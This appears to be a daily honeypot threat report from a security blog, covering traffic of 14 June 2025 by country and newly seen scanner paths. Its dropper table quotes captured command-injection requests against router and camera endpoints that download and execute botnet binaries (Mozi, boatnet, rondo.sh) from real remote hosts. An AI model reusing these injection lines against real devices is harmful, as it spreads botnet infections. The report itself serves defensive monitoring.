Skip to main content
  1. Daily-Posts/

Report: 2025-06-14

·585 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-06-14
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

executive_summary
#

In today’s repport, we detected 6 stage 1 IP address(es), linked to 6 dropper URL(s).

There are 58 new requests that have never been observed before (these were added to the monitored request database.).

A total of 800 requests were recorded during the day, originating from 6 different countries, with a peak of 267 requests coming from US.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
PLIsrael
CNGeorgia

botnet_dropper_behaviour
#

remote_addrrequest
141.98.11.83GET /shell?cd+/tmp;iptables+-I+INPUT+-p+tcp+-s+141.98.11.147+–dport+5500+-j+ACCEPT;+iptables+-I+INPUT+-p+tcp+–dport+5500+-j+DROP;rm+-rf+j;nohup+wget+http:/\x5C/94.26.90.251/x86;chmod+777+;./x86+x86;cd+/tmp;rm+-rf+j;nohup+wget+http:/\x5C/94.26.90.251/arm7;chmod+777+;./arm7+arm7;cd+/tmp;rm+-rf+j;nohup+wget+http:/\x5C/94.26.90.251/arm4;chmod+777+;./arm4+arm4;cd+/tmp;rm+-rf+j;nohup+wget+http:/\x5C/94.26.90.251/arm5;chmod+777+;./arm5+arm5 HTTP/1.1
141.98.11.83GET /shell?cd+/tmp;wget+http://94.26.90.251/payload1.sh+-O-+
103.207.124.191GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://103.207.124.191:38029/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
144.172.103.59POST /device.rsp?opt=sys&cmd=S_O_S_T_R_E_A_MAX&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20boatnet.arm7%3B%20wget%20http%3A%2F%2F15.235.149.59%2Fhiddenbin%2Fboatnet.arm7%3B%20chmod%20777%20%2A%3B%20.%2Fboatnet.arm7%20tbk HTTP/1.1
45.135.194.34GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(killall -9 mipsel mpsl;(wget -O- http://154.91.254.95/rondo.sh
45.135.194.34GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(killall+-9+mipsel+mpsl%3B%28wget+-O-+http%3A%2F%2F154.91.254.95%2Frondo.sh%7C%7Cbusybox+wget+-O-+http%3A%2F%2F154.91.254.95%2Frondo.sh%29+%7C+sh+-s+tplink%3B) HTTP/1.1

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

number_of_occurencerequest
422GET /.direnv HTTP/1.1
432GET /.env_s3 HTTP/1.1
442GET /static HTTP/1.1
452GET /.env0.2 HTTP/1.1
522GET /auth.env HTTP/1.1
532GET /.env.pem HTTP/1.1
572GET /.env.crt HTTP/1.1
592GET /.env.rc HTTP/1.1
602GET /.env0.1 HTTP/1.1
771GET /actuato%72 HTTP/1.1
781GET /actuato%2572 HTTP/1.1
811GET /venv.bak HTTP/1.1
831GET /prod.env HTTP/1.1
841GET /win/.env HTTP/1.1
851GET /prod-api;/actuator; HTTP/1.1
881GET /_ignition/health-check HTTP/1.1
901GET /api;/actuator; HTTP/1.1
941GET /env.bak/ HTTP/1.1
951GET /env.base HTTP/1.1
961GET /prod-api/actuator HTTP/1.1
1331GET /163/.env HTTP/1.1
1351GET /__ENV.js HTTP/1.1
1361GET /Www/.env HTTP/1.1
1431GET /140/.env HTTP/1.1
1441GET /blog.env HTTP/1.1
1461GET /zzz/.env HTTP/1.1
1481GET /xyz/.env HTTP/1.1
1491GET /zsh/.env HTTP/1.1
1501GET /out/.env HTTP/1.1
1521GET /l53/.env HTTP/1.1
1581GET /.env-csr HTTP/1.1
1591GET /.env.swo HTTP/1.1
1601GET /.env.swn HTTP/1.1
1611GET /.env-rce HTTP/1.1
1621GET /.env.sql HTTP/1.1
1631GET /.env_key HTTP/1.1
1641GET /.env.sns HTTP/1.1
1651GET /.env-ssl HTTP/1.1
1661GET /.env-csp HTTP/1.1
1671GET /.env.ses HTTP/1.1
1681GET /.env.log HTTP/1.1
1691GET /.env-gpg HTTP/1.1
1851GET /.envfile HTTP/1.1
1861GET /Tmp/.env HTTP/1.1
1881GET /.env.k8s HTTP/1.1
1901OPTIONS rtsp://xxx.xxx.xxx.xxx/ RTSP/1.0
2061GET /.env_ftp HTTP/1.1
2071GET /.env_gcp HTTP/1.1
2081GET /.env_gcs HTTP/1.1
2091GET /.env_git HTTP/1.1
2131GET /Security/users?auth=YWRtaW46MTEK HTTP/1.1
2151GET /RPC2_Login HTTP/1.1
2161GET /cgi-bin/main-cgi?json=%7B%22cmd%22:255,%22szUserName%22:%22%22,%22u32UserLoginHandle%22:-1%7D HTTP/1.1
2201GET /socket.io/1/?t=1749933664562 HTTP/1.1
2311\x00\x0E\x08\xD3\x10f\xA7\xB0\xC5}S\x00\x00\x00\x00\x00
2321\x00\x0E\x08\x04O\xD4\xEE\x00\xC4\x90*\x00\x00\x00\x00\x00
2331\x00\x0E8\x04O\xD4\xEE\x00\xC4\x90*\x00\x00\x00\x00\x00
2341\x00\x0E8\xD3\x10f\xA7\xB0\xC5}S\x00\x00\x00\x00\x00

country_iso_code
#

number_of_occurencecountry_iso_code
0267US
181GB
260NL
345PL
445BG
539LT
639DE
737HK
834SC
928CN
1016IN
1112ZA
1211JP
139CA
148AO
155GR
165BE
174TR
184GH
194ES
204SG
214NG
224VN
234AU
243RU
253KR
263FR
273BR
283KZ
292KW
302IL
312TM
322AZ
332IE
341TW
351RO
361HU
371PH
381SE
391IT

Related

Report: 2025-06-13
·2684 words
Repport Daily
Report: 2025-06-12
·339 words
Repport Daily
Report: 2025-06-11
·309 words
Repport Daily